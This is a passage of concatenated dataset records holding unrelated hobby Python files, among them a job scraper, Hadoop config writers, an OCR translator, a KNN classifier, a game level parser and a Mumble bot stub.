salary.replace(b'\\xee\\x8d\\x8a', b\"4\")\r\n salary = salary.replace(b'\\xee\\xb6\\xaa', b\"5\")\r\n salary = salary.replace(b'\\xee\\xb4\\xac', b\"6\")\r\n salary = salary.replace(b'\\xee\\x94\\x9d', b\"7\")\r\n salary = salary.replace(b'\\xef\\x9c\\xb0', b\"8\")\r\n salary = salary.replace(b'\\xef\\x86\\xbf', b\"9\")\r\n salary = salary.decode()\r\n #print(\"工作职位的名称为:{}\\n薪金为:{}\\n招聘公司的名称为:{}\\n\".format(job, salary, company_name))\r\n print(\"爬取\")\r\n global n\r\n sheet.write(n, 0, job)\r\n sheet.write(n, 1, company_name)\r\n sheet.write(n, 2, salary)\r\n sheet.write(n, 3, key_word)\r\n sheet.write(n, 4, city)\r\n n = n + 1\r\ndef main():\r\n job_url()\r\nif __name__ == '__main__':\r\n main()\r\n book.save(u'实习僧3.xlsx')\r\n","repo_name":"Luna1inai/Python","sub_path":"sxs/sxsfinal.py","file_name":"sxsfinal.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29832480170","text":"#!/usr/bin/env python2.7\n#@author Vipin Kumar\n\nimport properties\nimport os\n\n\nclass CONFIG(object):\n\n def factory(type):\n if type == \"HADOOP\":\n return HADOOP_CONFIG()\n if type == \"HBASE\":\n return HBASE_CONFIG()\n if type == \"ZOOKEEPER\":\n return ZOOKEEPER_CONFIG()\n if type == \"HIVE\":\n return HIVE_CONFIG()\n assert 0, \"Bad config type\" + type\n factory = staticmethod(factory)\n\n def appendEnv(self, prop, text):\n print (\"written\")\n with open(\"%s\" % prop, \"a\") as envFile:\n envFile.write(text)\n return True\n\n def writeConfig(self, configFile, text):\n with open(\"%s\" % configFile, \"w\") as confFile:\n confFile.write(text)\n return True\n\n\nclass HADOOP_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HADOOP_CONFIG.instance:\n super(HADOOP_CONFIG, self).__init__()\n else:\n HADOOP_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n 
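# --- Illustrative aside (my sketch): the chain of byte .replace() calls in
# sxsfinal.py above decodes shixiseng.com's obfuscated webfont digits. The
# same mapping reads more clearly as a dict plus a loop; the byte values are
# copied from the scraper and are specific to that site's custom font:
DIGIT_MAP = {b'\xef\x9a\x8d': b'0', b'\xee\x99\xb1': b'1', b'\xef\x9c\x86': b'2',
             b'\xef\x9b\x8d': b'3', b'\xee\x8d\x8a': b'4', b'\xee\xb6\xaa': b'5',
             b'\xee\xb4\xac': b'6', b'\xee\x94\x9d': b'7', b'\xef\x9c\xb0': b'8',
             b'\xef\x86\xbf': b'9'}

def decode_salary(raw: bytes) -> str:
    for obfuscated, digit in DIGIT_MAP.items():
        raw = raw.replace(obfuscated, digit)
    return raw.decode()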
(properties.GONDOR_ENV[\"HADOOP_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hadoop ENV variables---------\\n\"\n for key in properties.HADOOP_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HADOOP_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass HBASE_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HBASE_CONFIG.instance:\n super(HBASE_CONFIG, self).__init__()\n else:\n HBASE_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"HBASE_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hbase ENV variables---------\\n\"\n for key in properties.HBASE_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HBASE_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass ZOOKEEPER_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not ZOOKEEPER_CONFIG.instance:\n super(ZOOKEEPER_CONFIG, self).__init__()\n else:\n ZOOKEEPER_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"ZOOKEEPER_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------zookeeper ENV variables---------\\n\"\n for key in properties.ZOOKEEPER_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.ZOOKEEPER_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n\n\nclass HIVE_CONFIG(CONFIG):\n\n instance = None\n\n def __init__(self):\n if not HIVE_CONFIG.instance:\n super(HIVE_CONFIG, self).__init__()\n else:\n HIVE_CONFIG.instance\n\n def loadConfigs(self, filename, text):\n super(HADOOP_CONFIG, self).writeConfig(os.path.join\n (properties.GONDOR_ENV[\"HIVE_CONF\"], filename), text)\n\n def loadEnv(self):\n text = \"#----------hbase ENV variables---------\\n\"\n for key in properties.HIVE_VARIABLES:\n text = text + (\"export %s=%s\\n\" %\n (key, properties.HIVE_VARIABLES[key]))\n super(HADOOP_CONFIG, self).appendEnv(\"%s\" %\n properties.GONDOR_ENV[\"GONDOR_ENV_FILE\"], text)\n return True\n","repo_name":"vipinkumar7/Gondor","sub_path":"gondor-agents/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11365842686","text":"from threading import Thread\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5 import QtCore\nimport cv2\nfrom PIL import Image\nimport pytesseract\nimport requests\n\nclass BackThread (QObject, Thread):\n process_img = pyqtSignal(str)\n translate_txt = pyqtSignal(str)\n \n\n def __init__(self,parent=None):\n super(BackThread, self).__init__(parent)\n self.isDone=False\n self.img=''\n self.scannedTxt=\"\"\n self.translatedTxt=\"\"\n \n\n def processImg(self ):\n print(\"processImg\")\n if self.img != '':\n img =cv2.imread(self.img)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n gray = cv2.medianBlur(gray, 3)\n self.scannedTxt = pytesseract.image_to_string(gray)\n self.process_img.emit(self.scannedTxt)\n self.translateText()\n print(\"sc \"+self.scannedTxt)\n \n def translateText(self ):\n print(\"translateText\")\n content = 
{\"name\":self.scannedTxt}\n r = requests.get(\"https://script.google.com/macros/s/AKfycbyXcCEGICNYUj5Pch1ZQxEnR2E7YBWZ_eVlgSlaUouTdf_XIf0s/exec\",verify=True, params=content)\n text=r.text\n str_sucess='(\"Success\")'\n self.translatedTxt=text\n print(\"tr \"+self.translatedTxt)\n if str_sucess in text:\n print (\"found\")\n self.translatedTxt=text.replace(str_sucess, '')\n self.translate_txt.emit(self.translatedTxt)\n \n \n def run(self):\n print(\"running\")\n while True:\n if self.img != '':\n print(\"not none\")\n self.processImg()\n self.translateText()\n self.img = ''\n","repo_name":"nohadrweesh/Scanner-and-Translator","sub_path":"BackThread.py","file_name":"BackThread.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29935692723","text":"import os\r\nimport numpy as np\r\nimport cv2\r\nfrom tqdm import tqdm\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef see():\r\n # # 检测结果可视化\r\n test_dir = '/MyTest/test_imgs'\r\n det_dir = '/MyTest/det_res'\r\n det_vis_dir = '/MyTest/det_vis_test'\r\n\r\n os.makedirs(det_vis_dir, exist_ok=True)\r\n label_files = os.listdir(det_dir)\r\n cnt = 0\r\n plt.figure(figsize=(60, 60))\r\n for label_file in tqdm(label_files):\r\n if not label_file.endswith('.txt'):\r\n continue\r\n image = cv2.imread(os.path.join(test_dir, label_file.replace('det_res_', '')[:-4] + '.jpg'))\r\n\r\n with open(os.path.join(det_dir, label_file), 'r') as f:\r\n lines = f.readlines()\r\n\r\n save_name = label_file.replace('det_res_', '')[:-4] + '.jpg'\r\n if len(lines) == 0:\r\n cv2.imwrite(os.path.join(det_vis_dir, save_name), image)\r\n else:\r\n line = lines[0].strip().split(',')\r\n locs = [float(t) for t in line[:8]]\r\n\r\n # draw box\r\n locs = np.array(locs).reshape(1, -1, 2).astype(np.int32)\r\n image = cv2.imread(\r\n os.path.join(test_dir, label_file.replace('det_res_', '')[:-4] + '.jpg'))\r\n cv2.polylines(image, locs, True, (255, 255, 0), 8) # OpenCV使用BGR格式,8代表线条的粗细\r\n\r\n # save images\r\n save_name = label_file.replace('det_res_', '')[:-4] + '.jpg'\r\n cv2.imwrite(os.path.join(det_vis_dir, save_name), image)\r\n\r\n if cnt < 5: # 只画5张\r\n plt.subplot(151 + cnt)\r\n plt.title(save_name, fontdict={'size': 60})\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.imshow(image)\r\n plt.show()\r\n cnt += 1\r\n","repo_name":"Innocent-children/Water_meter_identification","sub_path":"water_meter_rec/see_det_result.py","file_name":"see_det_result.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39030095897","text":"#Muammer Tunahan Yildiz | 27968\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\n\r\n# Establish a connection to the database\r\ndef connect_to_database():\r\n try:\r\n connection = mysql.connector.connect(\r\n host='localhost',\r\n user='root',\r\n password='tunahan291',\r\n database='deaths'\r\n )\r\n print(\"Connected to the database!\")\r\n return connection\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed to connect to the database: {}\".format(error))\r\n return None\r\n\r\n# Close the database connection\r\ndef close_connection(connection):\r\n if connection and connection.is_connected():\r\n connection.close()\r\n print(\"Connection closed.\")\r\n\r\n# Example 
usage\r\nconnection = connect_to_database()\r\n\r\nif connection:\r\n try:\r\n # Create a cursor object to interact with the database\r\n cursor = connection.cursor()\r\n\r\n # Example query\r\n cursor.execute('''SELECT c.countries_name, c.iso_code, env.unsafe_water + env.unsafe_sanitation + env.hand_washing AS total_sanitation\r\nFROM countries c\r\nJOIN env_factor env ON c.iso_code = env.iso_code;\r\n ''')\r\n rows = cursor.fetchall()\r\n\r\n # Convert query result into a DataFrame\r\n columns = [column[0] for column in cursor.description]\r\n df = pd.DataFrame(rows, columns=columns)\r\n\r\n # Close the cursor\r\n cursor.close()\r\n\r\n\r\n print(df.head(5))\r\n \r\n fig = go.Figure(data=go.Choropleth(\r\n locations = df['iso_code'],\r\n z = df['total_sanitation'],\r\n text = df['countries_name'],\r\n colorscale = 'Inferno',\r\n autocolorscale=False,\r\n reversescale=True,\r\n marker_line_color='darkgray',\r\n marker_line_width=0.5,\r\n colorbar_title = 'Deaths/Year',\r\n zmax=100000,\r\n zmin=0\r\n \r\n ))\r\n fig.update_layout(\r\n width=1000,\r\n height=620,\r\n geo=dict(\r\n showframe=False,\r\n showcoastlines=False,\r\n projection_type='equirectangular'\r\n ),\r\n title={\r\n 'text': '<b>Deaths Caused By Unaccessible Clean Water Sources</b>',\r\n 'y':0.9,\r\n 'x':0.5,\r\n 'xanchor': 'center',\r\n 'yanchor': 'top',\r\n },\r\n title_font_color='#525252',\r\n title_font_size=26,\r\n font=dict(\r\n family='Heebo', \r\n size=18, \r\n color='#525252'\r\n )\r\n )\r\n fig.show()\r\n \r\n except mysql.connector.Error as error:\r\n print(\"Error executing query: {}\".format(error))\r\n\r\n finally:\r\n # Close the connection\r\n close_connection(connection)\r\n\r\n","repo_name":"kaanakcay/CS306-Project","sub_path":"STEP 4/map_graph.py","file_name":"map_graph.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24391032503","text":"from settings import *\nfrom entity.doors import Doors\nfrom entity.cube import Cube\nfrom entity.button import Button\nfrom entity.laser import Laser\nfrom entity.receiver import Receiver\nfrom draw import floor_blit\nfrom settings import textures_id\nfrom defs import textures_load\n\ndef map(X, Y):\n y = []\n x = []\n for i in range(0, Y):\n y.append(0)\n for t in range(0, X):\n x.append(y.copy())\n return x\n\n\ndef scan(text_map, textures):\n m = -1\n spawn_pos = 0, 0\n end_pos = 0, 0\n r = 0\n f = text_map.readlines()\n for j in range(0, len(f)):\n if f[j] == '@\\n':\n if f[j + 1] == 'size =\\n':\n size = (int(f[j + 2]), int(f[j + 3]))\n if f[j + 1] == 'jump =\\n':\n jump = int(f[j + 2])\n direction = 0 if f[j + 3] == 'x\\n' else 1\n if f[j] == '@s\\n':\n r = j\n break\n cubes = []\n doors = []\n buttons = []\n lasers = []\n receivers = []\n world_map1 = map(size[0], size[1])\n world_map2 = map(size[0], size[1])\n world_map3 = map(size[0], size[1])\n events = []\n for j in range(r, len(f)):\n if f[j] == '@1\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n world_map1[i][m] = char\n if char == 'S':\n spawn_pos = (i * TILE_x + TILE_x / 2, m * TILE_y + TILE_y / 2)\n if char == 'E':\n end_pos = (i, m)\n if f[j] == '@2\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n if char == 'L':\n lasers.append(Laser((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'l':\n lasers.append(Laser((i,m), 
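# --- Illustrative aside (my sketch): the Choropleth trace above takes ISO-3
# country codes in `locations` and the per-country value in `z`; ISO-3 is
# plotly's default locationmode. A minimal standalone version with made-up
# numbers:
import plotly.graph_objects as go

fig = go.Figure(go.Choropleth(
    locations=['USA', 'FRA', 'IND'],   # ISO-3 codes (sample data)
    z=[10, 20, 30],                    # value used to color each country
    colorscale='Inferno', reversescale=True))
# fig.show()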
reverse=True))\n world_map2[i][m] = ' '\n continue\n if char == 'D':\n doors.append(Doors((i, m), 0))\n world_map2[i][m] = ' '\n continue\n if char == 'd':\n doors.append(Doors((i, m), 0, reverse=True))\n world_map2[i][m] = ' '\n continue\n if char == 'K':\n cubes.append(Cube((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'E':\n cubes.append(Cube((i,m), laser=True))\n world_map2[i][m] = ' '\n continue\n if char == 'Q':\n cubes.append(Cube((i,m), quant=True))\n world_map2[i][m] = ' '\n continue\n if char == 'B':\n buttons.append(Button((i,m)))\n world_map2[i][m] = ' '\n continue\n if char == 'R':\n receivers.append(Receiver((i,m)))\n world_map2[i][m] = char\n if char == 'q':\n cubes.append(Cube((i,m), quant=True, laser=True))\n world_map2[i][m] = ' '\n continue\n if f[j] == '@3\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n world_map3[i][m] = char\n if f[j] == '@4\\n':\n m = -1\n for t in range(j + 1, j + size[1] + 1):\n m += 1\n for i, char in enumerate(f[t]):\n if char == '\\n':\n continue\n if char == 'b':\n events.append((i, m, char))\n continue\n if not ((char == '0') or (char == ' ')):\n events.append((i,m,int(char)))\n for door in doors:\n x = door.x\n y = door.y\n if (world_map2[x + 1][y] in stop_blocks) and (world_map2[x - 1][y] in stop_blocks):\n door.direction = 0\n if (world_map2[x][y + 1] in stop_blocks) and (world_map2[x][y - 1] in stop_blocks):\n door.direction = 1\n door.directions()\n for event in events:\n if event[2] != 0:\n if x == event[0] and y == event[1]:\n door.event_id = event[2]\n door.can_open = False\n\n for button in buttons:\n for event in events:\n if button.pos[0] == event[0] and button.pos[1] == event[1]:\n button.event_id = event[2]\n\n for laser in lasers:\n for event in events:\n if laser.pos[0] == event[0] and laser.pos[1] == event[1]:\n laser.event_id = event[2]\n\n for receiver in receivers:\n for event in events:\n if receiver.pos[0] == event[0] and receiver.pos[1] == event[1]:\n receiver.event_id = event[2]\n\n event_link = []\n for door in doors:\n if door.event_id in [0, 'b']:\n continue\n for button in buttons:\n if button.event_id in [0, 'b']:\n continue\n if door.event_id == button.event_id:\n event_link.append((door, button))\n for receiver in receivers:\n if receiver.event_id in [0, 'b']:\n continue\n if door.event_id == receiver.event_id:\n event_link.append((door, receiver))\n\n for laser in lasers:\n if laser.event_id in [0, 'b']:\n continue\n for button in buttons:\n if button.event_id in [0, 'b']:\n continue\n if laser.event_id == button.event_id:\n event_link.append((laser, button))\n for receiver in receivers:\n if receiver.event_id in [0, 'b']:\n continue\n if laser.event_id == receiver.event_id:\n event_link.append((laser, receiver))\n\n\n for laser in lasers:\n if world_map2[laser.x + 1][laser.y] == 'Z':\n laser.direction = 'left'\n elif world_map2[laser.x - 1][laser.y] == 'Z':\n laser.direction = 'right'\n elif world_map2[laser.x][laser.y + 1] == 'Z':\n laser.direction = 'up'\n elif world_map2[laser.x][laser.y - 1] == 'Z':\n laser.direction = 'down'\n laser.images()\n\n for entity in lasers + doors:\n if entity.reverse:\n entity.on = True\n\n\n floor_screen = floor_blit(world_map1, textures)\n\n\n return (world_map1, world_map2, world_map3), spawn_pos, end_pos, jump, size, doors, cubes, buttons, event_link,\\\n lasers, floor_screen, receivers, direction\n\n\n# def scan(text_map):\n# spawn_pos = 0,0\n# end_pos = 0,0\n# world_map = map()\n# 
for j, row in enumerate(text_map):\n# if row == '@\\n':\n# for t, row2 in enumerate(text_map):\n# if row2 == 'jump =\\n':\n# jump = int(text_map.readline(t + j + 1))\n# return world_map, spawn_pos, end_pos, jump\n# for i, char in enumerate(row):\n# if char == '\\n':\n\n\ndef next_level(number, textures):\n text_level = open(f'levels/level_{number}', 'r')\n\n s = scan(text_level, textures)\n text_level.close()\n return s\n","repo_name":"semakol/split_game","sub_path":"maping.py","file_name":"maping.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33615077567","text":"\nimport sys\nimport torch\n#from utils.salgan_generator import create_model\nfrom utils.salgan_generator import create_model, add_bn\nfrom utils.salgan_utils import load_image, postprocess_prediction\nfrom utils.salgan_utils import normalize_map\n\nfrom utils.sendTelegram import send\n\nimport cv2\nimport os\nimport random\nimport numpy as np\n\nfrom IPython import embed\n\nPATH_PYTORCH_WEIGHTS = '../trained_models/salgan_baseline.pt'\nUSE_GPU=True\nSALGAN_RESIZE = (192, 256) # H, W\nsize = None\nbgr_mean=[103.939, 116.779, 123.68]\nmodel = create_model(3)\nmodel.load_state_dict(torch.load(PATH_PYTORCH_WEIGHTS)['state_dict'])\nmodel.eval()\n\n# if GPU is enabled\nif USE_GPU:\n\tmodel.cuda()\n\n\nfilename = '/home/dataset/DHF1K/dhf1k_frames/199/0199.jpg'\nimage = cv2.imread(filename) # BGR format\nimage2 = image[0:160,0:320]\nH, W, C = image.shape\nif size is None:\n size = SALGAN_RESIZE\n\nimage = cv2.resize(image, (size[1], size[0]), interpolation=cv2.INTER_AREA)\nimage = image.astype(np.float32)\nimage2 = cv2.resize(image2, (size[1], size[0]), interpolation=cv2.INTER_AREA)\nimage2 = image2.astype(np.float32)\n\nbgr_mean=np.array(bgr_mean)\nimage -= bgr_mean\nimage2 -= bgr_mean\n\n# convert to torch Tensor\nimage = torch.FloatTensor(image)\nimage2 = torch.FloatTensor(image2)\n\n# swap channel dimensions\nimage = image.permute(2,0,1)\nimage2 = image2.permute(2,0,1)\n\n\nif USE_GPU:\n\timage = image.cuda()\n\timage2 = image2.cuda()\n\nfor img, name in zip([image,image2],[\"nocrop.png\",\"crop.png\"]):\n\t# run model inference\n\tprediction = model.forward(img[None, ...]) # add extra batch dimension\n\n\t# get result to cpu and squeeze dimensions\n\tif USE_GPU:\n\t\tprediction = prediction.squeeze().data.cpu().numpy()\n\telse:\n\t\tprediction = prediction.squeeze().data.numpy()\n\n\t# postprocess\n\t# first normalize [0,1]\n\tprediction = normalize_map(prediction)\n\tsaliency = postprocess_prediction(prediction, (320,640))\n\tsaliency = normalize_map(saliency)\n\tsaliency *= 255\n\tcv2.imwrite(os.path.join(\"/home/saliency_maps/\", name),saliency)\n","repo_name":"juanjo3ns/SalBCE","sub_path":"src/utils/boxroom/cropcheck.py","file_name":"cropcheck.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"31080825720","text":"import os, sys, argparse\nfrom package.commands import initialize\n\nparser = argparse.ArgumentParser(prog=\"SlackQL\")\nparser.add_argument(\"-m\", \"--migrate\", nargs=\"*\", help=\"applying migration(s)\")\nparser.add_argument(\"-r\", \"--rollback\", nargs=\"*\", help=\"rollback migration(s)\")\n# parser.add_argument(\"-db\", \"--create\", nargs=\"*\", help=\"create database\")\n# parser.add_argument(\"-db\", \"--reset\", nargs=\"*\", help=\"drop database, create database then apply 
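# --- Illustrative aside (my sketch): cropcheck.py above resizes to
# (H, W) = (192, 256), subtracts the per-channel BGR mean, and permutes
# HWC -> CHW before feeding the network. The same preprocessing in plain
# NumPy (resize omitted; the input image is random stand-in data):
import numpy as np

BGR_MEAN = np.array([103.939, 116.779, 123.68], dtype=np.float32)

img = np.random.randint(0, 256, (480, 640, 3)).astype(np.float32)
img = img - BGR_MEAN                 # broadcasts over the channel axis
chw = np.transpose(img, (2, 0, 1))   # HWC -> CHW, like image.permute(2, 0, 1)
print(chw.shape)                     # (3, 480, 640)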
migrations\")\nparser.add_argument(\"-g\", \"--generate\", nargs=\"*\", help=\"automatically generate file(s). First argument can be 'migration' or 'model'.\")\nparser.add_argument(\"-i\", \"--init\", nargs=\"*\", help=\"create SlackQL related files in your project folder\")\nparser.add_argument(\"-d\", \"--database\", type=str, default=\"psql\", choices=[\"psql\", \"mysql\", \"sqlite3\"], help=\"select a db: default to psql\")\nparser.add_argument(\"-s\", \"--spaces\", type=int, default=2, help=\"define the number of spaces when generating files\")\nargs = parser.parse_args()\nif args.init:\n # consider moving config to a folder so it can be imported properly\n initialize.initialize_files(args.init, args.database, args.spaces)\n\nelif args.generate:\n if args.generate[0] == \"model\":\n initialize.create_model(args.generate[1:], args.spaces)\n elif args.generate[0] == \"migration\":\n initialize.generate_migration(args.generate[1][0], args.spaces)\n else:\n parser.error(\"Unrecognize generate option {}.\".format(args.generate[0]))\n\n# elif args.create:\n# pass\n# elif args.reset:\n# pass\nelif args.migrate:\n pass\n\nsys.exit(0)\n","repo_name":"makenneth/SlackQL","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9702871238","text":"import django_filters\nfrom django import forms\n\nfrom django_filters import *\nfrom django_filters.widgets import *\nfrom bootstrap_datepicker_plus import DatePickerInput, TimePickerInput, DateTimePickerInput, MonthPickerInput, YearPickerInput\nfrom datetime import *\n\nfrom customstaff.models import *\n\nclass teacherLeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t'teachertimeofftype',\n\t\t'created_at'\n\t\t]\n\n\nclass nonteacherLeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t'nonteachertimeofftype',\n\t\t'created_at'\n\t\t]\n\nclass LeaveApplicationFilter(django_filters.FilterSet):\n\tcreated_at = DateFilter(label= 'Date Created', lookup_expr='gte')\n\tstartdate = DateFilter(input_formats=('%d/%m/%Y'),label= 'Start Date', lookup_expr='gte', widget=MonthPickerInput(\n format='%d/%m/%Y',\n attrs={\n 'class': 'datepicker'\n }\n ))\n\t\n\n\tclass Meta:\n\t\tmodel = LeaveApplication\n\t\tfields = [\n\t\t\n\t\t'alltimeofftype',\n\t\t'stafftype',\n\t\t'user',\n\t\t'created_at',\n\t\t'startdate',\n\t\t'attachmentreceived',\n\t\t'attachmentrequired'\n\t\t]","repo_name":"wxwong0019/leave-management","sub_path":"users/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6069065843","text":"import numpy as np\nimport Utilities as utils\nfrom scipy.spatial import distance\n\n\nclass KNN:\n def __init__(self, k: int):\n self.k = k\n self.train_samples = None\n self.train_labels = None\n\n def reset(self):\n self.train_samples = None\n self.train_labels = None\n\n def _update_features(self, samples, features):\n updated_samples = []\n for sample in samples:\n updated_samples.append(np.multiply(sample, features))\n return updated_samples\n\n def fit(self, samples, labels, features=None):\n assert len(samples) == 
len(labels)\n assert len(samples) >= self.k\n if features:\n assert len(features) == len(samples[0])\n samples = self._update_features(samples, features)\n self.train_samples = samples\n self.train_labels = labels\n\n def _k_nearest(self, sample):\n dists = []\n for i, train_sample in enumerate(self.train_samples):\n dists.append(distance.euclidean(sample, train_sample))\n # dists.sort(key=lambda element: element[0])\n min_k_indexes = np.argpartition(dists, self.k)\n return min_k_indexes[:self.k]\n\n def _get_votes(self, distances):\n votes = [0, 0]\n for idx in distances:\n votes[self.train_labels[idx]] += 1\n return votes\n\n def _majority(self, distances):\n votes = self._get_votes(distances)\n return np.argmax(votes)\n\n def predict(self, samples, features=None) -> list:\n y_predict = []\n if features:\n assert len(features) == len(samples[0])\n samples = self._update_features(samples, features)\n for sample in samples:\n k_nearest = self._k_nearest(sample)\n y_predict.append(self._majority(k_nearest))\n return y_predict\n\n\ndef main():\n accuracies = []\n vals_of_k = [i for i in range(1, 51)]\n for i in vals_of_k:\n knn_results: utils.KNNResults = utils.run_knn_classifier(KNN, i, normlize_data=False)\n accuracies.append(knn_results.accuracy)\n print(accuracies)\n print(vals_of_k)\n utils.draw_graph(vals_of_k, accuracies, \"Value Of K\", \"Accuracy\", \"Graph of accuracy as a function of K\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"emeel97/KNN-Project","sub_path":"KNN1.py","file_name":"KNN1.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6956881510","text":"'''\nCreated on Feb 6, 2012\n\n@author: johannes\n'''\n \nimport socket\nimport ssl\nimport platform\nimport Mumble_pb2\nimport struct\nimport time\nimport thread\nimport sys\n\nclass mumbleConnection():\n '''\n This class represents a persistent connection to a mumble Server\n via TCP. 
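# --- Illustrative aside (my sketch, not part of KNN1.py): the per-sample
# distance loop above can be vectorized; np.argpartition with kth = k - 1
# pulls the k smallest distances per row, matching _k_nearest. Assumes
# binary 0/1 labels, as _get_votes does:
import numpy as np

def knn_predict(train_X, train_y, test_X, k):
    # pairwise squared Euclidean distances, shape (n_test, n_train)
    d = ((test_X[:, None, :] - train_X[None, :, :]) ** 2).sum(axis=-1)
    nearest = np.argpartition(d, k - 1, axis=1)[:, :k]   # (n_test, k)
    return (train_y[nearest].mean(axis=1) > 0.5).astype(int)

train_X = np.random.rand(20, 3)
train_y = np.random.randint(0, 2, 20)
print(knn_predict(train_X, train_y, np.random.rand(4, 3), k=5))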
Id doesn't support UDP and taking in account the fact that\n UDP is optional it most likely never will.\n '''\n\n host = None\n port = None\n password = None\n sock = None\n session = None\n channel = None\n _pingTotal = 1 \n running = False\n _textCallbacks = []\n\n\n _messageLookupMessage = {Mumble_pb2.Version:0, Mumble_pb2.UDPTunnel:1, Mumble_pb2.Authenticate:2, Mumble_pb2.Ping:3, Mumble_pb2.Reject:4, Mumble_pb2.ServerSync:5,\n Mumble_pb2.ChannelRemove:6, Mumble_pb2.ChannelState:7, Mumble_pb2.UserRemove:8, Mumble_pb2.UserState:9, Mumble_pb2.BanList:10, Mumble_pb2.TextMessage:11, Mumble_pb2.PermissionDenied:12,\n Mumble_pb2.ACL:13, Mumble_pb2.QueryUsers:14, Mumble_pb2.CryptSetup:15, Mumble_pb2.ContextActionAdd:16, Mumble_pb2.ContextAction:17, Mumble_pb2.UserList:18, Mumble_pb2.VoiceTarget:19,\n Mumble_pb2.PermissionQuery:20, Mumble_pb2.CodecVersion:21}\n \n _messageLookupNumber = {}\n \n def __init__(self, host, password, port, nickname, channel):\n \"\"\"\n Creates a mumble Connection but doesn't open it yet.\n \n @param host: Mumble server to connect to, as hostname or IP address\n @type host: String\n @param password: Server password, if the server doesn't have one, leave it empty or put in whatever you like to.\n @type password: String\n @param port: Port on which the mumble server listens.\n @type port: String\n @param channel: Channel name the bot should join.\n @type channel: String\n \"\"\" \n self.host = host\n self.password = password\n self.port = port\n self.nickname = nickname \n self.channel = channel\n \n for i in self._messageLookupMessage.keys():\n self._messageLookupNumber[self._messageLookupMessage[i]] = i\n\n def _pingLoop(self):\n while(self.running):\n self._sendPing()\n time.sleep(1)\n\n def _mainLoop(self):\n while(self.running):\n self._readPacket()\n\n def _parseMessage(self, msgType, stringMessage):\n msgClass = self._messageLookupNumber[msgType]\n message = msgClass()\n message.ParseFromString(stringMessage)\n return message\n \n def addChatCallback(self, trigger, function):\n \"\"\"\n Adds a function and a trigger for that function. 
